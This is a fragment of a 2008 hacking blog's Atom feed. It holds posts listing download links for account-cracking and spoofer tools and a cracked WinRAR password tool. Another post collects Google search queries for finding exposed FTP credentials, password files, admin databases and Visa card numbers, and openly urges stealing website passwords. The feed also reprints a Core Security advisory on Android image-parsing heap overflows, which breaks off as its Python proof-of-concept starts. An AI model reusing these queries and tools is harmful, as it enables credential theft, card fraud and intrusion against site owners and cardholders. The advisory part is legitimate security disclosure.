/&gt;Accessdiver/Ares Parser by Sentinel:&lt;br /&gt;CODE&lt;br /&gt;http://sentinel.deny.de/ad_ares_parser.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Spoofers&lt;br /&gt;&lt;br /&gt;Zspoof by wolfman -&lt;br /&gt;CODE&lt;br /&gt;http://wolfman.deny.de/tools.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sploof by Jean Fages -&lt;br /&gt;CODE&lt;br /&gt;http://www.accessdiver.com/sploof.htm&lt;br /&gt;&lt;br /&gt;Final Spoof&lt;br /&gt;CODE&lt;br /&gt;http://www.beatharness.com/finalspoof/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Spooph by nast0&lt;br /&gt;CODE&lt;br /&gt;http://24.106.100.133/spooph/index.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;D-Spoof And Others (Russian Site, English Prog)&lt;br /&gt;CODE&lt;br /&gt;http://mspoofer.pisem.net/zaza/index.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;MVSLite By Mentor&lt;br /&gt;CODE&lt;br /&gt;http://mvs.freehosting.net/index.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mikho's Online Spoofer (web based spoofer, choose "open" when dialog appears)&lt;br /&gt;CODE&lt;br /&gt;http://www.mikhosoft.com/spoofs/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;QuickSpoof&lt;br /&gt;CODE&lt;br /&gt;http://httpd.chello.nl/%7Em-koster2/spoofs.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Other Tools&lt;br /&gt;&lt;br /&gt;Scholar by Sentinel - (History checker)&lt;br /&gt;CODE&lt;br /&gt;http://sentinel.deny.de/scholar.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Crackmate Gold by Xtremet (adultcheck gold pass verifier)&lt;br /&gt;CODE&lt;br /&gt;http://xtremet.deny.de/products.htm&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-7308842285573039725?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/7308842285573039725/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=7308842285573039725' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/7308842285573039725'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/7308842285573039725'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/bruteforcing-programs_20.html' title='Bruteforcing Programs'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-5213465983140801458</id><published>2008-03-13T11:33:00.001-07:00</published><updated>2008-03-22T04:53:01.451-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='password recovery'/><category scheme='http://www.blogger.com/atom/ns#' term='winrar password recovery'/><category scheme='http://www.blogger.com/atom/ns#' term='winrar'/><category scheme='http://www.blogger.com/atom/ns#' term='password hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='password cracking'/><title type='text'>WinRAR Password Recovery</title><content type='html'>Here is the tool to recover/hack passwords of an winrar file..so go 4 it..!!&lt;br /&gt;&lt;br /&gt;Download link:&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/24876686/rar_password_recovery_with_crack.rar&lt;br /&gt;&lt;br /&gt;Password: www.downloadwarez.org&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-5213465983140801458?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/5213465983140801458/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=5213465983140801458' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/5213465983140801458'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/5213465983140801458'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/winrar-password-recovery.html' title='WinRAR Password Recovery'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-167674543085572325</id><published>2008-03-13T11:04:00.000-07:00</published><updated>2008-03-22T04:44:57.659-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='idm'/><category scheme='http://www.blogger.com/atom/ns#' term='internet speed'/><category scheme='http://www.blogger.com/atom/ns#' term='fast browsing'/><title type='text'>Boost Internet Surfing Speed-Working!!</title><content type='html'>I've experienced the big boost in my surfing &amp; downloading speed by the following combination.&lt;br /&gt;&lt;br /&gt;Firefox + IDM + TCP Optimizer&lt;br /&gt;&lt;br /&gt;Plz do a speed test of your net connection before &amp; after at hCEp://speedtest.net/ to know what difference this software has made.&lt;br /&gt;&lt;br /&gt;1) Every1 knows that how to Speed Up the Firefox.&lt;br /&gt;&lt;br /&gt;Who dont know, just do the following.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:&lt;br /&gt;&lt;br /&gt;network.http.pipelining&lt;br /&gt;network.http.proxy.pipelining&lt;br /&gt;network.http.pipelining.maxrequests&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* Alter the entries do as follows:&lt;br /&gt;&lt;br /&gt;Set "network.http.pipelining" to "true"&lt;br /&gt;&lt;br /&gt;Set "network.http.proxy.pipelining" to "true"&lt;br /&gt;&lt;br /&gt;Set "network.http.pipelining.maxrequests" to some number like 30.&lt;br /&gt;&lt;br /&gt;* Lastly right-click anywhere and select New-&gt; Integer.&lt;br /&gt;Name it "nglayout.initialpaint.delay" and set its value to "0".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2) Now Download &amp; Install IDM. ( The Best Download Manager I've ever used. )&lt;br /&gt;hCEp://rapidshare.com/files/99013377/Internet_Download_Manager_5.12_Prateek_s_The_Hacker.rar&lt;br /&gt;&lt;br /&gt;3) Now Download TCP Optimizer&lt;br /&gt;:: Download ::&lt;br /&gt;hCEp://wCw.download.com/SG-TCP-Optimizer/3000-2155_4-10415840.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;When u open TCP Optimizer, dont do anything, just select the option 'Optimal Settings' &amp; apply the changes.&lt;br /&gt;In the next box, press OK and reboot.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp; Plzzz its my request to every1 that plz reply to this topic only after u try this.&lt;br /&gt;&lt;br /&gt;Before speed: 210 KBPS&lt;br /&gt;After speed: 280 KBPS&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-167674543085572325?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/167674543085572325/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=167674543085572325' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/167674543085572325'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/167674543085572325'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/boost-internet-surfing-speed-working.html' title='Boost Internet Surfing Speed-Working!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-7327447281854950534</id><published>2008-03-11T03:46:00.000-07:00</published><updated>2008-03-25T08:02:41.099-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='google tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>Google Advanced Search Options....Njoy!!</title><content type='html'>ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!&lt;br /&gt;&lt;br /&gt;That's some good stuff. Just copy/paste the text into your own WS FTP ini file and you're good as gold (assuming you're using the same version). Don't forget - even if they have taken the file offline, use the "cache:FULL_URL/wsftp.ini" to see the contents.&lt;br /&gt;probably one of the best exploits I have seen in a long time, when I did it there were about 20 vulnerable computers, just recently there was 4 so I hope whitehats got to this before anyone else. really nice !!&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;intitle:index.of ws_ftp.ini&lt;br /&gt;&lt;br /&gt;Frontpage.. very nice clean search results listing !! I magine with me that you can steal or know the password of any web site designed by "Frontpage". But the file containing the password might be encrypted; to decrypt the file download the program " john the ripper".&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;"# -FrontPage-" inurl:service.pwd&lt;br /&gt;&lt;br /&gt;This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics.&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;"AutoCreate=TRUE password=*"&lt;br /&gt;&lt;br /&gt;WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords.&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;filetype:ini ws_ftp pwd&lt;br /&gt;&lt;br /&gt;Or&lt;br /&gt;&lt;br /&gt;"index of/" "ws_ftp.ini" "parent directory"&lt;br /&gt;&lt;br /&gt;Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are! And much adminstrated passwords and user passwords, a lot of emails and the such too…&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;allinurl: admin mdb&lt;br /&gt;&lt;br /&gt;DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun.&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;allinurl:auth_user_file.txt&lt;br /&gt;&lt;br /&gt;These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext.&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;filetype:cfm "cfapplication name" password&lt;br /&gt;&lt;br /&gt;The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the "index of" keyword or by searching directly for the PWD= value inside the configuration file.&lt;br /&gt;&lt;br /&gt;There is an easy way to decrypt the hash, use the decryptor at:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.codebluehacks.com/Tools.php?ID=1&lt;br /&gt;&lt;br /&gt;Or&lt;br /&gt;&lt;br /&gt;http://www.hispasec.com/directorio/laboratorio/Software/ws_ftp.html&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;filetype:ini ws_ftp pwd&lt;br /&gt;These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;filetype:log inurl:"password.log"&lt;br /&gt;&lt;br /&gt;Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail).&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;"adding new user" inurl:addnewuser -"there are no domains"&lt;br /&gt;&lt;br /&gt;Google is so smart, it’s scary sometimes. I has found another interesting (to say the least) Google use.&lt;br /&gt;I just ran across a pretty scary new google trick. It seems they have just recently added number span searching to their engine. Take a look at this example:&lt;br /&gt;&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;visa 4356000000000000..4356999999999999&lt;br /&gt;&lt;br /&gt;Basically, what this search does is search for the word “visa” [credit card] with any numbers that fit within your query. i.e. any Visa credit card number with the first four digits 4356.&lt;br /&gt;As you can see, Google has searched the entire range against its DB. Within minutes I found some crazy sites like this one. Now please know that Google didn’t create this tool to be used like this. It’s actually quite handy when used correctly. Just an FYI for all of you.&lt;br /&gt;&lt;br /&gt;Let's pretend you need a serial number for windows xp pro. The key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.&lt;br /&gt;To see results; just write in the (http://www.google.com/) search engine the code:&lt;br /&gt;&lt;br /&gt;"Windows XP Professional" 94FBR&lt;br /&gt;&lt;br /&gt;By the way, don't forget to change "Window sXP Professional" to any product you need its serial number.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-7327447281854950534?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/7327447281854950534/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=7327447281854950534' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/7327447281854950534'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/7327447281854950534'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/03/google-xploitsnjoy.html' title='Google Advanced Search Options....Njoy!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-6320121169007531898</id><published>2008-03-10T04:07:00.000-07:00</published><updated>2008-03-22T04:56:29.393-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='android vulnerabilites'/><category scheme='http://www.blogger.com/atom/ns#' term='google android'/><category scheme='http://www.blogger.com/atom/ns#' term='android hack'/><category scheme='http://www.blogger.com/atom/ns#' term='android'/><title type='text'>Vulnerablities in GOOGLE ANDROID SDK</title><content type='html'>&lt;h3 class="smller"&gt;Multiple vulnerabilities in Google's Android SDK&lt;/h3&gt; &lt;div class="para"&gt; Mar 04 2008 06:26PM&lt;br /&gt;Core Security Technologies Advisories (advisories coresecurity com)&lt;br /&gt;&lt;br /&gt;-----BEGIN PGP SIGNED MESSAGE-----&lt;br /&gt;Hash: SHA1&lt;br /&gt;&lt;br /&gt;Core Security Technologies - CoreLabs Advisory&lt;br /&gt;&lt;a href="http://www.coresecurity.com/corelabs" target="_blank"&gt;http://www.coresecurity.com/corelabs&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Multiple vulnerabilities in Google's Android SDK&lt;br /&gt;&lt;br /&gt;*Advisory Information*&lt;br /&gt;&lt;br /&gt;Title: Multiple vulnerabilities in Google's Android SDK&lt;br /&gt;Advisory ID: CORE-2008-0124&lt;br /&gt;Advisory URL: &lt;a href="http://www.coresecurity.com/?action=item&amp;amp;id=2148" target="_blank"&gt;http://www.coresecurity.com/?action=ite&lt;wbr&gt;m&amp;amp;id=2148&lt;/a&gt;&lt;br /&gt;Date published: 2008-03-04&lt;br /&gt;Date of last update: 2008-03-04&lt;br /&gt;Vendors contacted: Google&lt;br /&gt;Release mode: Coordinated release&lt;br /&gt;&lt;br /&gt;*Vulnerability Information*&lt;br /&gt;&lt;br /&gt;Class: Heap overflow, integer overflow&lt;br /&gt;Remotely Exploitable: No&lt;br /&gt;Locally Exploitable: No&lt;br /&gt;Bugtraq ID: 28006, 28005&lt;br /&gt;CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,&lt;br /&gt;CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269&lt;br /&gt;&lt;br /&gt;*Vulnerability Description*&lt;br /&gt;&lt;br /&gt;Android is project promoted primarily by Google through the Open Handset&lt;br /&gt;Alliance aimed at providing a complete set of software for mobile&lt;br /&gt;devices: an operating system, middleware and key mobile applications&lt;br /&gt;[1]. Although the project is currently in a development phase and has&lt;br /&gt;not made an official release yet, several vendors of mobile chips have&lt;br /&gt;unveiled prototype phones built using development releases of the&lt;br /&gt;platform at the Mobile World Congress [2]. Development using the Android&lt;br /&gt;platform gained activity early in 2008 as a result of Google's launch of&lt;br /&gt;the Android Development Challenge which includes $10 million USD in&lt;br /&gt;awards [3] for which a Software Development Kit (SDK) was made available&lt;br /&gt;in November 2007.&lt;br /&gt;The Android Software Development Kit includes a fully functional&lt;br /&gt;operating system, a set of core libraries, application development&lt;br /&gt;frameworks, a virtual machine for executing application and a phone&lt;br /&gt;emulator based on the QEMU emulator [4]. Public reports as of February&lt;br /&gt;27th, 2008 state that the Android SDK has been downloaded 750,000 times&lt;br /&gt;since November 2007 [5].&lt;br /&gt;&lt;br /&gt;Several vulnerabilities have been found in Android's core libraries for&lt;br /&gt;processing graphic content in some of the most used image formats (PNG,&lt;br /&gt;GIF an BMP). While some of these vulnerabilities stem from the use of&lt;br /&gt;outdated and vulnerable open source image processing libraries other&lt;br /&gt;were introduced by native Android code that use them or that implements&lt;br /&gt;new functionality.&lt;br /&gt;&lt;br /&gt;Exploitation of these vulnerabilities to yield complete control of a&lt;br /&gt;phone running the Android platform has been proved possible using the&lt;br /&gt;emulator included in the SDK, which emulates phone running the Android&lt;br /&gt;platform on an ARM microprocessor.&lt;br /&gt;&lt;br /&gt;This advisory contains technical descriptions of these security bugs,&lt;br /&gt;including a proof of concept exploit to run arbitrary code, proving the&lt;br /&gt;possibility of running code on Android stack (over an ARM architecture)&lt;br /&gt;via a binary exploit.&lt;br /&gt;&lt;br /&gt;*Vulnerable Packages*&lt;br /&gt;&lt;br /&gt;. Android SDK m3-rc37a and earlier are vulnerable several bugs in&lt;br /&gt;components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of&lt;br /&gt;this advisory).&lt;br /&gt;. Android SDK m5-rc14 is vulnerable to a security bug in the component&lt;br /&gt;that process BMP images (bug #3).&lt;br /&gt;&lt;div class="para"&gt; *Non-vulnerable Packages*&lt;br /&gt;&lt;br /&gt;. Android SDK m5-rc15&lt;br /&gt;&lt;br /&gt;*Vendor Information, Solutions and Workarounds*&lt;br /&gt;&lt;br /&gt;Vendor statement:&lt;br /&gt;&lt;br /&gt;"The current version of the Android SDK is an early look release to the&lt;br /&gt;open source community, provided so that developers can begin working&lt;br /&gt;with the platform to inform and shape our development of Android toward&lt;br /&gt;production readiness. The Open Handset Alliance welcomes input from the&lt;br /&gt;security community throughout this process. There will be many changes&lt;br /&gt;and updates to the platform before Android is ready for end users,&lt;br /&gt;including a full security review."&lt;br /&gt;&lt;br /&gt;*Credits*&lt;br /&gt;&lt;br /&gt;These vulnerabilities were discovered by Alfredo Ortega from Core&lt;br /&gt;Security Technologies, leading his Bugweek 2007 team called "Pampa&lt;br /&gt;Grande". It was researched in depth by Alfredo Ortega.&lt;br /&gt;&lt;br /&gt;*Technical Description / Proof of Concept Code*&lt;br /&gt;&lt;br /&gt;Android is a software stack for mobile devices that includes an&lt;br /&gt;operating system, middleware and key applications. Android relies on&lt;br /&gt;Linux version 2.6 for core system services such as security, memory&lt;br /&gt;management, process management, network stack, and driver model. The&lt;br /&gt;kernel also acts as an abstraction layer between the hardware and the&lt;br /&gt;rest of the software stack.&lt;br /&gt;&lt;br /&gt;The WebKit application framework is included to facilitate development&lt;br /&gt;of web client application functionality. The framework in turn uses&lt;br /&gt;different third-party open source libraries to implement processing of&lt;br /&gt;several image formats.&lt;br /&gt;&lt;br /&gt;Android includes a web browser based on the Webkit framework that&lt;br /&gt;contains multiple binary vulnerabilities when processing .GIF, .PNG and&lt;br /&gt;.BMP image files, allowing malicious client-side attacks on the web&lt;br /&gt;browser. A client-side attack could be launched from a malicious web&lt;br /&gt;site, hosting specially crafted content, with the possibility of  executing arbitrary code on the victim's Android system.&lt;br /&gt;&lt;br /&gt;These client-side binary vulnerabilities were discovered using the&lt;br /&gt;Android SDK that includes an ARM architecture emulator. Binary&lt;br /&gt;vulnerabilities are the most common security bugs in computer software.&lt;br /&gt;Basic bibliography on these vulnerabilities includes a recently updated&lt;br /&gt;handbook about security holes that also describes current&lt;br /&gt;state-of-the-start exploitation techniques for different hardware&lt;br /&gt;platforms and operating systems [6].&lt;br /&gt;&lt;br /&gt;The vulnerabilities discovered are summarized below grouped by the type&lt;br /&gt;of image file format that is parsed by the vulnerable component.&lt;br /&gt;&lt;br /&gt;#1 - GIF image parsing heap overflow&lt;br /&gt;&lt;br /&gt;The Graphics Interchange Format (GIF) is image format dating at least&lt;br /&gt;from 1989 [7]. It was popularized because GIF images can be compressed&lt;br /&gt;using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the&lt;br /&gt;memory footprint and bandwidth required for transmission and storage.&lt;br /&gt;&lt;br /&gt;A memory corruption condition happens within the GIF processing library&lt;br /&gt;of the WebKit framework when the function 'GIFImageDecoder::onDecode()'&lt;br /&gt;allocates a heap buffer based on the _Logical Screen Width and Height_&lt;br /&gt;filed of the GIF header (offsets 6 and 8) and then the resulting buffer&lt;br /&gt;is filled in with an amount of data bytes that is calculated based on&lt;br /&gt;the real Width and Height of the GIF image. There is a similar (if not&lt;br /&gt;the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the&lt;br /&gt;open-source version included by Android in&lt;br /&gt;'WebKitLib\WebKit\WebCore\platform\image&lt;div class="para"&gt;&lt;wbr&gt;-decoders\gif\GifImageDecoder.cp&lt;br /&gt;p'&lt;br /&gt;inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].&lt;br /&gt;&lt;br /&gt;Detailed analysis:&lt;br /&gt;&lt;br /&gt;When the process 'com.google.android.browser' must handle content with&lt;br /&gt;a GIF file it loads a dynamic library called 'libsgl.so' which contains&lt;br /&gt;the decoders for multiple image file formats.&lt;br /&gt;Decoding of the GIF image is performed correctly by the library giflib&lt;br /&gt;4.0 (compiled inside 'libsgl.so'). However, the wrapper object&lt;br /&gt;'GIFImageDecoder' miscalculates the total size of the image.&lt;br /&gt;&lt;br /&gt;First, the Logical Screen Size is read and stored in the following&lt;br /&gt;calling sequence (As giflib is an Open Source MIT-licenced library, the&lt;br /&gt;source was available for analysis):&lt;br /&gt;'GIFImageDecoder::onDecode()-&gt;DGifOpen()&lt;div class="para"&gt;&lt;wbr&gt;-&gt;DGifGetScreenDesc()'. The last&lt;br /&gt;function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and&lt;br /&gt;Height_ in a structure called 'GifFileType':&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;Int DGifGetScreenDesc(GifFileType * GifFile) {&lt;br /&gt;...&lt;br /&gt;/* Put the screen descriptor into the file: */&lt;br /&gt;if (DGifGetWord(GifFile, &amp;amp;GifFile-&gt;SWidth) == GIF_ERROR ||&lt;br /&gt;DGifGetWord(GifFile, &amp;amp;GifFile-&gt;SHeight) == GIF_ERROR)&lt;br /&gt;return GIF_ERROR;&lt;br /&gt;...&lt;br /&gt;}&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;We can see that the fields are stored in the first 2 words of the&lt;br /&gt;structure:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;typedef struct GifFileType {&lt;br /&gt;/* Screen dimensions. */&lt;br /&gt;GifWord SWidth, SHeight,&lt;br /&gt;...&lt;br /&gt;}&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;In the disassembly of the GIFImageDecoder::onDecode() function provided&lt;br /&gt;below we can see how the DGifOpen() function is called and that the&lt;br /&gt;return value (A GifFileType struct) is stored on the $R5 ARM register:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;.text:0002F234 BL _DGifOpen&lt;br /&gt;.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5&lt;br /&gt;- -----------/&lt;br /&gt;&lt;div class="para"&gt; Then, the giflib function 'DGifSlurp()' is called and the Image size is&lt;br /&gt;correctly allocated using the Image Width and Height and not the Logical&lt;br /&gt;Screen Size:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;Int DGifSlurp(GifFileType * GifFile)&lt;br /&gt;{ ... ImageSize = sp-&gt;ImageDesc.Width * sp-&gt;ImageDesc.Height;&lt;br /&gt;sp-&gt;RasterBits = (unsigned char *)malloc(ImageSize *&lt;br /&gt;sizeof(GifPixelType));&lt;br /&gt;...&lt;br /&gt;}&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;Afterwards the _Logical Screen_ Width and Height are stored in the R9&lt;br /&gt;and R11 registers:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;However the actual image may be much larger that these sizes that are&lt;br /&gt;incorrectly passed to a number of methods of the 'GIFImageDecoder':&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;ImageDecoder::chooseFromOneChoice():&lt;br /&gt;.text:0002F294 MOV R0, R8&lt;br /&gt;.text:0002F298 MOV R1, #3&lt;br /&gt;.text:0002F29C MOV R2, R9&lt;br /&gt;.text:0002F2A0 MOV R3, R11&lt;br /&gt;.text:0002F2A4 STR R12, [SP,#0x48+var_3C]&lt;br /&gt;.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;&lt;br /&gt;ImageDecoder::chooseFromOneChoice(SkBitm&lt;wbr&gt;ap::Config,int&lt;br /&gt;,int)&lt;br /&gt;&lt;br /&gt;Bitmap::setConfig():&lt;br /&gt;.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap&lt;br /&gt;.text:0002F2BC MOV R1, #3 &lt;/div&gt; &lt;br /&gt;&lt;div class="para"&gt; .text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !&lt;br /&gt;.text:0002F2C4 MOV R3, R11&lt;br /&gt;.text:0002F2C8 STR R10, [SP,#0x48+var_48]&lt;br /&gt;.text:0002F2CC BL _Bitmap9setConfig ;&lt;br /&gt;Bitmap::setConfig(SkBitmap::Config,uint,&lt;wbr&gt;uint,uint)&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;This function stores the SWidth and SHeight inside the Bitmap object as&lt;br /&gt;shown in the following code snippet:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7&lt;br /&gt;.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8&lt;br /&gt;.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;And later:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;.text:00035C58 BL _Bitmap15ComputeRowBytes ;&lt;br /&gt;SkBitmap::ComputeRowBytes(SkBitmap::Conf&lt;wbr&gt;ig,uint)&lt;br /&gt;.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes&lt;br /&gt;.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth&lt;br /&gt;.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight&lt;br /&gt;.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes&lt;br /&gt;- -----------/&lt;br /&gt;&lt;br /&gt;The following python script generates a GIF file that causes the&lt;br /&gt;overflow. It requires the Python Imaging Library. Once generated the GIF&lt;br /&gt;file, it must be opened in the Android browser to trigger the overflow:&lt;br /&gt;&lt;br /&gt;/-----------&lt;br /&gt;&lt;br /&gt;##Android Heap Overflow&lt;br /&gt;##Ortega Alfredo _ Core Security Exploit Writers Team&lt;br /&gt;##tested against Android SDK m3-rc37a&lt;br /&gt;&lt;br /&gt;import Image&lt;br /&gt;import struct&lt;br /&gt;&lt;br /&gt;#Creates a 